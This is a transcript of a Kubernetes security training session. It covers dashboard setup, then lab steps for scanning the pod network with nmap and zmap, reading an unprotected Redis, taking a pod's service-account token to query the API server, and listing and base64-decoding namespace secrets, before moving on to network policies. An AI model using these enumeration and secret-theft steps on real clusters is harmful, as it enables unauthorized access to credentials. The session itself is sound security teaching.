Okay, I think that we, let's see if we were able to.
Okay.
Let me copy the commands here for you.
It went backwards.
The one that I sent is the last one.
Yeah.
I need to be in this folder, in this directory that I am.
Okay.
When you execute this last one,
this is something called a token,
which I'm going to explain that later.
But actually what we just,
what we are doing here is first create a deployment
with the dashboard.
It has like two or three pods and a service
and some stuff for the dashboard to work.
And we are creating a user, a user
with role-based access.
And we are assigning a role for that user,
linking the user that we created
with the dashboard namespace.
So it can handle that.
And then we are creating a token for that user
to access the dashboard.
Okay.
So these.
Like how you do it in database,
like you create a schema and then you create a role
and then grant privileges.
Perfect analogy.
Exactly, exactly.
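A sketch of those steps; the dashboard manifest URL and version are the upstream defaults and may differ from what was used here:

  kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.7.0/aio/deploy/recommended.yaml
  kubectl -n kubernetes-dashboard create serviceaccount admin-user
  kubectl create clusterrolebinding admin-user --clusterrole=cluster-admin --serviceaccount=kubernetes-dashboard:admin-user
  kubectl -n kubernetes-dashboard create token admin-user   # prints the token to paste into the login screen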
So this will show you a token.
You need to copy that because we will need it
and execute the command to proxy.
Okay.
Ah, but before that, before kubectl proxy, sorry.
Before that, let's see if our,
the dashboard,
the dashboard was created.
I don't see it.
Ah yeah, I do see it.
kubernetes-dashboard.
Oh yeah, and it's running.
So it's not failing on us.
So, kubectl proxy.
This will open a port to,
in order for us to access the dashboard.
Oh God.
Yeah, because that way we can.
So what kind of role is granted?
I mean, you can check the YAML file.
Yeah, sure, sure, sure.
You can just open the, the,
the visual code in that directory
and you can take a look.
But we are going to do that step by step.
So, but it's, take a look.
Yeah, so it says the user, the object,
because actually in Kubernetes,
there is no such thing as a user,
but it's like the equivalent.
So the cluster role, which is cluster-admin,
and it has control over the whole cluster.
And the service account, which is the admin user.
A service account, it can be a user or an application.
Yeah.
So that's where you are linking that
with the API of authorization.
Got it, yeah, okay.
Okay, so here, let's go to the,
to the browser.
And it should be in the,
in the, you need to run first kubectl proxy, right?
No.
No, I'm sorry.
So.
No.
Oh.
Oh, this is a bit,
I'm not sure what are you doing.
Open up the dashboard.
This is the, on the API actually.
This is the URL that you need to open.
Yeah.
I just,
copy that.
I already opened one.
Okay.
Here.
I send you the full URL to the chat.
Okay, okay.
I need to do a talking.
Okay, thanks.
So how do you remember such a big URL?
No, no, no, no, I went to the,
to the GitHub repo.
And it's the, but actually it should be shown
or printed by the kubectl proxy command,
but it didn't do it.
I'm not sure where.
Because it's like, wow.
But if you take a look,
it's not that hard to decipher.
I mean, because it's the API, the version, the namespace,
the kubernetes-dashboard namespace, the service.
Yeah, but you have to remember the sequence of it.
Yeah, absolutely.
Yeah.
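For reference, the standard kubectl proxy path for the dashboard service looks like this:

  kubectl proxy   # serves the API on localhost:8001
  # then open:
  # http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/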
Okay.
Okay.
So, finally, let me introduce you to the dashboard.
The Kubernetes dashboard.
So just a quick review, as we weren't able to do it before.
So here at the top, in the top left,
you will find like a menu.
It shows you all the namespaces available.
It's set to default.
But if you choose all namespaces,
you will be able to see everything here.
The DaemonSets, deployments, the jobs, the pods,
the ReplicaSets.
There are three pods failing, or that failed previously.
And actually we do have 21 pods running,
which is, it's the equivalent of 21 servers, right?
So the DaemonSets, the deployments,
all of the stuff that is here, the jobs.
And if you remember the API, it's here.
It's the same structure.
Wow.
It's there.
Okay.
Yeah.
If you want to take a look at the pods.
So if I want to take a look at the pods
for a specific namespace, I can filter later.
And in these three buttons, you will see, for example, logs.
So it will show you the logs for this pod.
Okay.
And going back, you can, for example, exec,
which will give you the terminal,
exactly the same as kubectl exec -ti
plus the pod, dash dash, sh, it's the same here.
So I'm not sure if this pod has a shell,
so let's wait a little bit.
Because actually, if you think about it,
you will realize that there is no real reason
for a container to have a shell.
I mean, you want to run an application,
a Python application, a Node.js application,
a Java application, whatever.
But is a shell needed to run the app?
In a lot of cases, there is no need for that.
So just doing that, you will reduce the attack surface
a lot.
So I'm not sure.
So how do you avoid that?
Come again?
How do you avoid that, getting the shell on?
When you prepare the image, I mean,
you can use an image that doesn't have a shell.
There are a lot of them actually, let me show you.
The images available, the ones from Alpine.
Alpine images.
So they have a lot of different images that you can use.
These are, these ones, the mini root filesystems.
Or you can build one in your case.
It's not showing anything.
I mean, whether there is a shell or not.
Let's try the other one.
It showed an error as well.
So perhaps it's...
So what we can do is just go to the container
that we want.
Okay, the hacker container.
Yeah.
Yeah, that one.
Let's see, that one.
Okay, it's here.
The frame.
Okay, so here.
Okay, so it showed up instantly.
So it has a shell.
Well, actually I'm not sure, because it seems different.
Oh yeah, the one that we ran here was plain sh.
The one that is here is bash.
Anyway, so.
If you run ls, you will find, it's too small.
I need to move here.
It's too small.
So.
So here you will find some utilities that are available.
Actually, we can use this container for other things
during the training.
Well, this is kubectl.
This is a, well, it's...
This is for checking stuff, installations.
So there is a lot of stuff here.
And in /usr/bin, there are different tools.
Let's see if there is an nmap.
Yeah, there is an nmap.
For example, have you ever used it?
Are you familiar with it?
Okay, Nikto. Nikto is a URL scanner.
I mean, this is able to probe a site.
So it may, for example, this may work with the first lab.
Okay.
There is another one to check here.
I have to check if it's here.
Yeah, there is another tool, zmap.
Which is,
which is, it's similar to nmap.
What else can we see?
For example, we can, let's see if we have ip,
ip address show.
So with ip address show, you can
see what IP address this container has.
So you can see the network.
So what you can do is, let's do an nmap -sP.
I recall it's, 10.244.0.0/24.
Let's do,
let's see what other hosts we are able to see.
So we were able to see 16 hosts.
Let's try what address do you have there.
With IP AS, you can see.
So in this scenario, what we have is,
I mean, if I'm a hacker and I'm trying to understand
the network I have access to,
what I will do is first look at the IP range,
which is what we just did.
Then let's see what other machines are available.
And here you will see a lot of stuff.
And actually what I want us to see is that
we are in this container, in this namespace, sorry,
and we are mapping all the cluster.
And we were able to see,
if we take a look at the dashboard,
the namespaces here.
You can duplicate this tab so you don't lose the shell.
With the right button, duplicate tab.
Take the duplicate tab, okay.
And that's where the namespaces are.
Okay, here, cluster namespaces.
So there is this, all of these namespaces,
one, two, three, four, five, six, seven, eight namespaces.
And if I take a look at the pods,
each namespace has several pods, pods, sorry.
So what we did here was,
we enumerated all those pods,
or the ones that we were able to see.
And you can see that we are in the default namespace,
in this container, but we are seeing stuff
from the dashboard namespace,
from the other namespaces, from the kube-system.
Actually, what we are seeing here,
this is super important to understand.
This is the service discovery
domain name standard.
Every cluster, any cluster, Kubernetes cluster,
it always will have svc.cluster.local
as its domain name.
And it will have the namespace,
and it will have the application,
or the service, or the pod that is running here.
In this case, it's showing us the IP address as well.
So whenever you see this,
you will be able to understand that
this specific IP address, it's in this namespace,
and it corresponds to this pod, or to this deployment.
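The naming pattern, with the dashboard service as a concrete example:

  # <service>.<namespace>.svc.cluster.local
  nslookup kubernetes-dashboard.kubernetes-dashboard.svc.cluster.local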
So we are seeing in the Kubernetes dashboard,
the default, these services,
which are at the default namespace.
These are from the kube-system namespace.
Let's see.
It shows all of those.
Yeah.
So for example, if we want to explore,
if we want to explore
a specific one, for example, we will,
it's so common in Kubernetes to have MongoDB databases,
or Elasticsearch,
or a MySQL, or Redis, or whatever.
So you can scan all the network,
looking for a specific port, for example.
With nmap, we can do that.
We're going to try zmap,
and we're going to look for the Redis port,
which is the example for this lab,
but we can look, can you see?
Ah, sorry, and this is the network, 10.244.0.0.
This is able to create a file, a CSV file,
with the information.
So let's run it.
Wait, we need to check
the file, I'm not sure if there is a vim here, let's see.
If not, we just use more or cat, that's it.
Okay, it's vi.
The blackest.
Yeah, I'm shooting.
I think, perhaps it's because of this.
I just commented it out in the file.
Wait, are you familiar with vi?
Okay, cool.
Yeah, okay.
We all went through that, trying to escape vi.
So, okay.
Okay, so this is scanning,
and the output file,
it shows us where that IP is.
So we can use nmap, if I remember correctly,
it's -sP, the same thing,
6379, and I don't remember the syntax.
This here is, I think it's the same.
It's the same.
Yeah.
Yeah.
Oh, we're good on time.
So, but this is the difference with zmap,
which is kind of cooler.
Yeah.
Easier to read, because it only shows you
which one is open.
Yeah.
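A sketch of that port scan, under the same pod-network assumption as before:

  zmap -p 6379 10.244.0.0/24 -o results.csv   # find hosts with the Redis port open
  cat results.csv
  nmap -p 6379 --open 10.244.0.0/24           # the nmap equivalent, showing only open ports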
But we can, for example, let's try with zmap,
on port 80.
Okay, and it shows that there are three open ports
on different hosts.
We can, I'm not sure if host is here, yeah,
host is here, so I can try to get the names of those IPs.
So I will understand what are they,
because I mean, this is so descriptive,
the idea that you're deploying your application
has a frontend, backend, database.
So usually the database will be called Mongo,
or MySQL, or Postgres will be the name
for this deployment.
The backend usually is called backend,
or perhaps the name of the microservice,
if you have several microservices,
and it's descriptive because it shows what it does,
OCR or authorization, whatever.
So analyzing that, you will get more insights
about your system.
So.
And this is, I mean, obviously applying this
to our own systems actually is super cool
because we do like an insider,
and you will be able to discover what is happening inside.
So let's see, in this case, this is a middleware,
this is a service called cache-store,
so it has information.
As we were looking for Redis specifically,
we can, it could be a Mongo,
I don't think, I don't believe that there is a Mongo here,
but we are just going to connect to that Redis,
and it's there.
So if I want to see,
let's do keys star.
So for example, these are the keys saved in Redis,
and if you want to get one of them,
you will be able to have it.
So you can, like,
explore and obtain the information
that you are looking for.
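A sketch of that interaction; the IP comes from the scan results and the key name is hypothetical:

  redis-cli -h 10.244.0.25   # connect to the host that had 6379 open
  keys *                     # at the redis prompt: list the stored keys
  get SECRETSTUFF            # read one of them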
So let's see if you can connect there too.
This is a,
this is,
this is,
yeah, is there something like passwords?
Yeah, exactly.
So it may be some passwords or something like that.
So let's do our last lab of this kind.
We're going to do a role-based access control
misconfiguration.
So we're going to see what happens
when we don't have properly configured
role-based access controls here.
So let me show you.
So the idea here is we're going to talk
with the API server using the REST API,
and, I mean, do what we have already done,
but checking the role-based access,
see how a too-permissive permission,
or a misconfigured permission,
allows us to gain access to more information
within our cluster.
So in order to do that,
we are going to this,
this scenario,
which is running in the port 1236.
So let's go to localhost,
1236.
So this is also super common because, I mean,
we tend to give users more privileges
than they really require.
So just because, I mean, being so granular
is sometimes so cumbersome,
you just give the root access
or the high-level access.
So we're going to see
what do we have here.
So in this case, let's see the environment
in this pod,
in this deployment.
So printing the environment shows us
the variables defined.
Let's see if we see something interesting here.
Obviously this is running as root.
The idea here is to find a secret
that is not properly,
I mean, that is accessible to everyone
because the role-based access control privileges are wrong.
So there is one of them,
let me show you here,
I'm going to jump.
Let me show you this.
Here.
So in Kubernetes,
there is no such thing as a user account per se,
what we have is service accounts.
So these service accounts are used,
I would say by everyone,
by every kind of object or resource.
But in the end, some of those objects are us, the humans.
Other objects are the pods, for example, or applications.
So a service account,
it's something that is authorized by the API server
when a request comes from a pod,
which uses it.
So each pod, when it tries to request something
or to report something via the kubelet,
needs to be authenticated,
and that is done by the service account.
So by default, every pod uses the default service account
of the cluster.
So there is like one service account,
well, actually like two or three service accounts
for the whole cluster, to handle the access
to, for example, the registry where the images are,
to the API server,
to any other service within the cluster.
So these service accounts usually are associated
with the cluster, with the namespace,
and are tied to a role that gives the scope of action
of that service account,
which is what I want to show you.
Usually the token for these service accounts
is stored at this location.
Yeah, in var run secrets kubernetes.io serviceaccount,
or a similar location as well.
or a similar location as well.
So what we are going to do here is let's find this.
So this is like a standard for every container.
So here, secrets.
var run secrets.
serviceaccount.
And here it is.
There is this service account.
This information here, there is the certificate,
the CA, and there is the token.
The token is like the password,
like the way to access that user.
So having this token gives us power,
or gives us control, over the API server.
If the token has enough privileges,
or the role that it is associated with
has enough privileges, we can do anything.
I mean, wherever it's available.
So that is why it's important
to have the least privileges possible.
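Where that identity lives inside any pod, as commands:

  ls /var/run/secrets/kubernetes.io/serviceaccount/   # ca.crt, namespace, token
  cat /var/run/secrets/kubernetes.io/serviceaccount/token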
So let's see.
So first let's-
But is there no way to avoid
storing the token in that location?
No, no, because it's needed by the pod
to request anything from the kubelet or to report anything.
So what needs to be done is that
the token only gives access, for example,
to this namespace, to this pod,
to read or to send this information
and nothing else.
So no more access.
I mean, this token should not have the power
to create another deployment, just to give an example.
Okay, so this is the token.
That is there.
And let me check because what do we need here?
Let me go here again.
We need to be able to talk with the API server,
to communicate, using curl, with the API server.
The API server requires a token from us to work.
So what we will need to know is, where is this API server?
We don't know.
We need like an IP.
Usually the port is a standard.
So we will need to find that.
So let's see.
So, okay, print the environment.
It can be here, I guess.
KUBERNETES_SERVICE_PORT.
Okay, KUBERNETES_SERVICE_HOST.
Yeah.
That should be the API server.
We can check with curl.
HTTPS, and then this API address.
The port, it says where it is.
The port is 443.
Let's see if we can see it.
Okay, it says that the certificate is not valid.
So we need dash k.
Okay.
We are not able to access the API server
without authentication.
It's forbidden.
So we need to authenticate.
So what we are going to do is to authenticate using curl.
So first we need the certificate.
Which is, where is it?
Secrets, kubernetes.io serviceaccount.
So there is this certificate.
Then, in order to connect to the API server,
we need to send the token in a header.
Like, probably you're familiar,
are you familiar with JWT tokens, for example?
Yeah.
Okay, so it's kind of similar to that.
So in this case, we are going to use
the Authorization header.
We are going to send the token and see what happens.
However, let me save the token in a variable
because it's too big to paste here.
So, okay.
So let's export, okay.
One, two, three, four, five, six, seven, eight.
I don't have, let's see.
I'm going to come out.
I need, it doesn't let me,
the parent prefix.
Ha ha ha.
What else can I do?
Okay, I think this is all.
Okay, I have it here.
I can copy it from here, I guess.
So let me see this.
It's not typing.
You know what?
I guess that we can access the same container from the side
because I'm going to open another tab
and let's see.
kubectl get pods.
What's the name?
The hunger-check deployment.
Is that it?
What's that?
Oh, that's, that's the health check.
Yeah, and it's hunger-check.
Let's see.
I can see the IP addresses here.
Ah, no, I know.
Perhaps it's in another, in a different namespace.
Oh yeah, it's here.
big-monolith.
So let's connect here, because we need to be able to copy.
So this will be kubectl,
exec -it,
the name of the pod,
dash n, and let's see, dash dash.
The name is going to change.
Yeah, okay.
Okay, I missed the,
where should I put that?
Dash n big-monolith.
What is it?
Perhaps it's,
okay, yeah.
So,
okay, okay.
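Roughly the commands being assembled here; the pod name is a placeholder, since it changes per cluster:

    # Find the pod in the big-monolith namespace
    kubectl get pods -n big-monolith
    # Open a shell inside it (the pod name below is just an example placeholder)
    kubectl exec -it <hunger-check-pod-name> -n big-monolith -- sh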
So we are here.
Let's confirm that we are here.
Yeah, R4, R4 is busy.
Okay.
Okay.
Let's,
/var/run.
Where is it, that one, secrets, secrets.
That one, secrets.
Okay.
Okay, yeah.
Now we can do it.
So, export TOKEN,
equals,
dollar sign,
parentheses,
cat the token file, right.
Let's see with echo dollar TOKEN,
it should show it to us, yeah, it's working.
Let me, okay, this one here.
So,
it works.
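A minimal sketch of saving the mounted token, assuming the default service account mount path:

    export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
    echo $TOKEN   # should print the JWT, so we know the variable is set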
Okay, and we need,
I need to remember the IP address for the,
for the API server.
So, okay, let's go.
curl,
dash, dash,
cacert,
cacert,
and /var/run/secrets/
kubernetes.io/
serviceaccount/
ca.crt, okay.
No, here though.
And,
this is kind of nightmare.
I need,
where is it?
Let's see.
There are some
keys that don't work.
I'm not sure why.
This
is too fast.
Okay.
Let's see if it works.
Oh yeah, it worked.
So, Authorization,
Bearer,
dollar sign,
I forgot the name of this variable.
Okay.
Dash,
X,
GET,
and here we go,
https,
this is it.
And,
and this,
this is,
slash, api.
Okay.
Okay.
Yeah.
Okay.
So, let's try again.
Oh, it worked.
This one,
yes.
So,
and with slash.
This is like internal resolution of the server.
Yeah.
It's showing us, I mean,
we are just seeing here like this API,
and the clients, the server address,
but now we need to see what else we can do.
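Putting the pieces together, roughly what the authenticated request looks like; the host and port come from the environment variables seen earlier:

    SA=/var/run/secrets/kubernetes.io/serviceaccount
    curl --cacert $SA/ca.crt \
         -H "Authorization: Bearer $TOKEN" \
         https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT/api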
So, for example, I mean, the API is this,
and what we want to explore is this.
So, I can list
all the objects that are here,
we can try to see them,
the API core,
the services,
in fact, let me,
I mean, the most valuable thing,
or one of the most valuable things that I may find
in a Kubernetes cluster through the API, are the secrets.
So, let's see, where are they?
Here.
Secrets.
So, it's api,
/api/v1,
kind Secret.
That's like the path.
So, let's try.
/api/v1/secrets.
It's forbidden.
So, it's forbidden.
So, the scope of this token
doesn't allow us to list this resource.
So, actually, when you create a role for a service account,
you have these verbs,
which define what we can do.
So, list, read, write, stuff like that is what you can do.
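As an illustration of those verbs, a least-privilege Role could look something like this; the names here are hypothetical, not part of the lab:

    apiVersion: rbac.authorization.k8s.io/v1
    kind: Role
    metadata:
      name: read-only-example       # hypothetical name
      namespace: big-monolith
    rules:
    - apiGroups: [""]
      resources: ["pods", "services"]
      verbs: ["get", "list"]        # no create, no delete, no access to secrets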
Let's try another one.
So, again, I can go here.
Okay, let's try to find, for example,
the, where are they?
Okay, these resources.
The namespaces.
So, it's v1, namespaces.
So,
/api/v1/
namespaces.
Oh, it's forbidden as well.
So,
no, wait.
Okay, let's try our namespace.
Our namespace was,
it's here.
Where is it, secrets, namespaces.
It's written there.
Okay, /api/v1/namespaces/ plus the namespace.
Probably, if we know the secret name, we'll be able to get it.
Yes, that's true.
We're going to write it.
So, slash big-monolith.
big-monolith, and then the secrets, which is actually what we were talking about.
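A sketch of the namespace-scoped request being built here; the namespace can also be read from the mounted service account files:

    SA=/var/run/secrets/kubernetes.io/serviceaccount
    NS=$(cat $SA/namespace)    # big-monolith in this lab
    curl --cacert $SA/ca.crt -H "Authorization: Bearer $TOKEN" \
         https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT/api/v1/namespaces/$NS/secrets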
Okay, so, the scope of this token,
it's confined to the namespace.
So, we can see, okay, let's see what,
what stuff we can see from this namespace,
and the secrets will be interesting to know.
So, here we find,
for example, this webhook API key.
So, we were able to get an API key.
And also, there is the vault API key.
Yeah, the vault API key, which is,
I mean, the common way to protect a secret
is to store it in a vault.
But if I am able to get the vault API key,
I may have a problem there.
And let's see another thing here.
The pods, for example.
So, it shows us the pods that we have.
Actually, we could prettify this with jq,
if you want to install it,
ah, sorry, forget about it,
we are inside the container, I forgot.
So, there is, no.
Let's see what else we can see, services, yeah.
So, basically, we can do a lot of stuff
inside this namespace in this particular case.
Yeah.
Now, let's go back to the secrets and let's do this.
It turns out, are you familiar with this?
Like this.
Nice and simple.
Yeah, with this encoding.
So, this is,
this is base64 encoding,
which is the encoding standard
for secrets in Kubernetes.
So, that is not encryption, it's just an encoding.
So, it goes in both senses, yes, in both directions.
So, with this command, I'm able to decode the encoding.
So, we are able to get,
in this case, the key.
That was the vault API key,
and I can do the same with this one.
Although, I think it's the same.
Oh yeah, it's the same, I don't know.
Oh, it's different.
It's different, yeah.
Yeah, this is, yeah.
So, there it goes.
So, we have the,
we have what?
The secret, decoded.
So, for example, if the secret were the key of a certificate,
I mean, in the secret you would have the key, the CRT.
So, you would have the certificates available
for you to work with.
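A minimal example of the decoding step; the values below are made up, not the ones from the lab:

    echo 'YWRtaW4=' | base64 -d       # decodes to: admin
    echo -n 'supersecret' | base64    # encodes to: c3VwZXJzZWNyZXQ=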
Okay, so let's move on.
So, we've got the lab for the image.
We have the lab for the privileges.
We have the lab for the networking policies.
We also have the lab for the role-based access control.
So, let's do,
let's do, let's work with, let's start.
I'm going to start with the network policies.
And we are going to start building on top of that.
Let me look for that.
So, network policies.
So, the network policy.
Okay, well, let's start saying this.
We already established that the network
inside a Kubernetes cluster is flat
and that you can jump from one container,
which is in a specific namespace,
to another container, which is in another namespace.
I mean, at least you have connectivity.
So, you can, for example, do what we did:
reach the database that was in another namespace
from the namespace where I was running my containers.
So, everyone is able to talk to each other.
So, let's analyze that a little bit.
If I have a cluster, and in this cluster,
I have a development environment,
a production environment, a QA environment
in the same cluster, in these namespaces,
and we are using the standard network for Kubernetes,
we will face the issue that, for example,
production gets hacked, gets compromised,
or development gets compromised.
Perhaps it's easier, or QA, it's easier,
it's exposed or something, and from there,
they can jump to production or access production,
or access data which is in production.
So that is the worst case scenario.
Or within the same company, if it's a big company,
perhaps someone can access a different namespace
with different information that you don't really want
for them to access.
So, we need to implement network policies.
That is the reason why I am starting here,
because it's the most effective way
to start securing your Kubernetes cluster.
This policy behaves like a firewall.
So, it's a firewall that blocks the communication
between the pods.
It can be applied to pods within the same namespace.
I can apply it using labels.
I can create ingress rules and egress rules,
for the traffic that goes into the pods
or that exits the pods.
I can create a policy for a specific port,
but in order for this to work,
I will require a container network
interface (CNI) plugin that enforces these policies.
By default, the policies don't do anything
if I'm not using such a plugin.
So, let's, well, let's advance a little bit.
So, this is a repo.
Actually, I'm going to put this link in our repo.
This has a lot of recipes for different network policies,
because, I mean, these policies vary a lot
depending on your application.
I mean, depending on the complexity of your application,
if you have an application with five, with 10,
with 100 microservices,
the simplest way to approach that,
which is the most common, is that within the namespace,
you don't apply any policy.
So, any pod, any service can communicate
with any other service, microservice, or container
within that namespace.
But perhaps that's not wise,
because it's possible that you have like your data backend,
and you have like some middleware,
and you have a frontend,
and if your frontend is able to connect
to the data backend directly,
I mean, there can be a data leak
if there is any vulnerability in your application.
So, and let's be clear with that.
Here with Kubernetes, you must assume
that your applications exposed to the internet
are vulnerable, and they can be compromised.
So, you need to act as if that were a fact,
as if that were already true.
That's the mindset that you need to have, right?
So, in this example, or in this diagram,
what we see is that we have a frontend
with the application web,
and the external traffic is able to access here,
but is not able to access the other applications.
And the application is able to access
these other applications, these are their labels,
foo and bar, but they are not able to communicate
with each other. This is like the idea.
So, there are some commands
that we are going to explore after that.
So, there are certain recommendations.
The idea is that you don't want to allow
all the traffic to come in,
you want to be selective about which traffic you want to receive,
you don't want to allow all traffic between the pods,
the idea is that you specify which are the flows
that you want to see within your application.
Here, you need to be careful,
because if we block kube-system, for example,
from other namespaces,
we won't be able to reach the API server, for example,
and we won't be able to work,
so we would be blocking our cluster,
which is not what I want.
Another thing which is more advanced,
but it's important, is that you don't want to allow
your pods to access the internet.
And if you take a look, I mean,
why, I mean, if you design an application,
a service that is small enough to run in a container
which has only the basics,
does this application need to access the internet
for anything?
It's like the question that you need to ask yourself.
Ninety-something percent of the time, the answer is no,
there is no need to access the internet at all.
So the idea is to block any outgoing traffic from your pods,
allowing only what is needed, for example,
the egress traffic that is going to another pod,
to the backend, for example,
if that's in a different namespace, that's allowed, and so on.
So how does egress matter?
I mean, as long as we are blocking the ingress,
no one should be able to access it,
no traffic should come inside.
Even if egress is open, how does that matter?
Yeah, because actually the lab that we're going to do
deals exactly with that situation.
I restrict the ingress, but if I have an open egress,
I can, for example, install something on my container.
Yeah, so I mean, you restrict the ingress
and you only allow the frontend service
to be accessed by the users,
but the frontend has a vulnerability that's exploited.
With this vulnerability, they are able to make this service,
this container, to download something, a payload,
and execute it, which is exactly the way
that a compromise is done.
Exploit something and make it download a payload.
So this is the situation where you don't want
any egress traffic to be available.
So we are going to do that.
There are other approaches,
allow only egress within the cluster,
but not to the internet,
and for certain pods that really need access to the internet,
you allow them to do so.
We can work with IP addresses, but they are hard to handle,
so it's better to use namespaces or labels
to handle this stuff.
In the case of kube-system, it's dangerous.
I mean, you need to do it carefully,
because if you do it wrong, you can block your cluster
from working, so it's important to take that into account.
Your ingress needs to be able to receive
external requests, pods must be able to access the DNS
to resolve names for service discovery,
the DNS needs to go outside
if it's forwarding some requests,
and the monitoring tools,
since monitoring is all about scraping the stuff that you have,
which usually runs in other namespaces,
will require that access.
If you're using operators like for backup or certificates
or something else, they will need probably to access that.
We're going to do this, but usually you need to restart
the service for the network policy to take effect.
We need to do some tricks sometimes
to make it work with labels,
because not all the resources, the objects,
are able to use that.
Handling the API server has its complexity,
and some plugins don't work well with the policies,
so you need to be careful.
There are several plugins; we are going to use Calico,
which is the one that is being used by Amazon,
Azure, Google, by every provider, so it's a safe choice.
There is another way, which is to use a service mesh,
like Istio, which filters at a higher level,
a higher layer.
But what we are going to do, I think it's,
so we're going to do, to execute this lab.
So for this lab, we're going to move to a different cluster,
we are going to leave Goat behind,
and in this other cluster, we have a kube-system,
we have an Ingress controller, which is called Traefik,
it's similar to NGINX, for example,
it's an alternative to it,
and we are going to have two namespaces,
one called default, the other one called production.
Default will have a web console,
like the ones that we have been using,
so we can access remotely when we work,
and we're going to see that this namespace
is able to access production, to this no-sql-client,
to this MongoDB database directly,
and then we're going to start applying the ingress policies
and see how they affect things.
This other namespace called production
has a frontend called no-sql-client,
which is a web frontend for Mongo,
it's kind of beautiful,
and it has a MongoDB as well.
And there is some other stuff around this,
which is the monitoring, Prometheus specifically,
I mean, Prometheus is scraping these deployments
to gather information, and it can graph it
and show us the information,
so we will check that as well.
So let's begin, let me check here, one second.
Yeah, so let's move here,
I'm just going to open a new tab,
let's go to the netpol directory,
here in k8s-security, labs, netpol,
so here we have a folder with the network policies
that we are going to implement,
and let me check one thing,
do you want to go for a break?
You're fine.
You're fine, okay, so we can finish earlier then.
We are going to do this now and that's it.
Okay, ready, so,
right, okay, so these are the policies
that we are going to implement,
but before doing that,
in the cluster that we have,
we are using the default network,
so it's open,
and it doesn't have the plugin that enforces the policies,
so we're going to check that.
So let's move to the other cluster with kubectx:
execute kubectx, and let's move to netpol, kubectx
netpol.
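A sketch of the context switch; the context name netpol follows what is typed in class, and may differ in your kubeconfig:

    kubectx                          # list the available contexts
    kubectx netpol                   # switch to the netpol cluster
    kubectl config current-context   # confirm where we are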
Okay, so we are in this cluster,
let's check first with kubectl,
get all, all namespaces,
oh no, it already shows the,
the what, the plugin, oh,
I installed it, okay,
so this is the cluster, if you take a look,
it's kind of big,
I mean, we can see the nodes,
it has the nodes,
the worker and the control plane,
and it has, let's see,
let's see the ingress, the ingress,
all namespaces,
oh, it doesn't have Traefik installed yet,
let me check one second, please.
Okay, so we need to execute a script that we were missing,
so let's go to this directory,
let's make sure,
yeah, okay,
and we need to go to the network policies directory,
and there is this apply script.
What this script is going to do
is to deploy all of this, plus the Prometheus
and the monitoring stuff, the Traefik,
the web console, all of this,
which is not installed yet.
So yes, we are going to say yes,
and wait,
no, it shouldn't take this much,
let's see what is happening,
it seems like I'm seeing an error here,
let's see,
let me do this,
there is some issue with the network,
oh, I didn't read that,
it's running the same thing over and over again.
Yeah, but it's not, let me see,
because perhaps I did miss the,
the network installation,
ah, finally, I'm not sure, maybe it was because of the jq,
did you Control-C the installation or?
Yeah, we ran the apply again,
it was because of the jq,
okay, so it's good,
okay, so let's see, okay, let's see what we have,
and let's go to the,
you should have the Kubernetes dashboard
in Firefox; we will need to get the secret,
execute this command,
so you can have your token,
okay,
so you can log in here,
oh, it's not working,
let's create a new one,
I don't know, you know what,
I'm missing the kubectl proxy,
come on,
ah, it's still running from the previous one,
yeah, yeah, yeah, so we need to stop it,
and run it again,
and reload this, because this was pointing
to the other cluster,
okay, so,
that's okay, so,
okay, so we have the web console,
we're going to see it,
we're gonna view the services
and deployments,
we're gonna show the web console,
okay, we're just seeing the deployments here,
there is the Traefik one,
which is the dashboard,
the dashboard for the Ingress controller,
the web console,
the Prometheus server,
the no-sql-client,
which are the deployments,
these are the deployments,
and the services,
and everything,
so,
what we are going to do is the following,
so,
the Ingress controller,
Traefik, is giving us access
to each one of those services,
by their names,
so,
we are going to try,
let me check here,
and first,
it shows traefik as one of them,
I used to,
so,
it's traefik,
HTTP,
okay, so,
it asks for user and password,
it's admin,
one two three four five,
one two,
sorry, what is that?
One two three four five,
admin, one two three four five.
Okay, okay,
gone, gone,
just give me one sec,
I'll get some. Yeah, sure.
So,
that,
so,
sorry, what did I need to do?
Go to Firefox,
and traefik,
http traefik,
no,
no, no, no,
don't use the IP address,
because
the Ingress controller is handling the names,
it's redirecting by name.
Oh, okay,
should I type
traefik dashboard or just traefik?
Just traefik,
HTTP?
Yeah.
I don't like that,
I think it's just too bad.
Yeah, because it goes to Google if you don't type.
Okay.
Okay, so,
okay, so,
what we are seeing here,
it's the,
the,
the dashboard for Traefik,
it shows us the frontends,
which are the ones accessible from the internet.
So, the Prometheus one,
the Traefik one,
the web console,
we're going to go there,
and the backends,
which are not accessible,
the no-sql-client,
well,
there is a frontend for no-sql-client,
Prometheus,
Traefik,
web console,
and the backends.
It shows us the health of the,
of the Ingress controller,
the errors,
the amount of errors,
all of that.
It's super,
super basic.
So, let's open now the Prometheus one,
http,
prometheus.
Admin, one two three four five.
Now let's open the no-sql-client,
with
admin, one two
three four five.
And the web console will be the other one.
But just to remember,
we have,
we are here outside,
we have the Traefik,
which is the Ingress controller,
and what we are doing is,
if you take a look at the,
at the /etc/hosts file,
it's all the same IP address, right?
Yeah.
So this is the,
this is the ingress IP address,
which is handled by Traefik,
and when the request says web console,
it sends the traffic to the namespace,
default, with the web console application.
And if it says no-sql-client,
it shows this.
And that's it.
So,
where do we see that these are all
different namespaces?
Yeah.
So, if we take a look in the Kubernetes dashboard,
we are going to see that,
for example, Prometheus,
it's in the monitoring namespace,
Mongo and the no-sql-client are in the production
namespace,
web console is in default,
and Traefik is in kube-system, yeah?
So this web console,
we can log in there,
with admin, one two three four five.
So,
this, this doesn't have ping,
but it has curl.
So,
we're going to do,
so this again,
we're here,
the namespace default.
Yeah?
Yeah.
And this is the no-sql-client,
which is in this namespace,
this one.
The no-sql-client can connect to MongoDB,
to,
well, MongoDB is its data backend.
So we're going to connect here,
just to check.
It shows us the database, MongoDB,
and we can connect there.
So, it shows us the information,
and if we want to see the collections of the database,
to check what is in here,
we execute,
and it shows us the array,
and we can explore it,
it's hard to read,
so, the Star Wars characters, right?
So, and this is Prometheus,
and let's,
let's get some information here.
So let's,
let's ask Prometheus to show us the MongoDB connections.
So if we execute that,
it will show us the information
that it has gathered from,
from Mongo,
and it can graph that.
And I mean,
there is a lot of information here
that we can query,
yeah,
for everything.
I'm sure there is something for the web console
also.
For our purposes,
what we're going to play with is with MongoDB.
Okay.
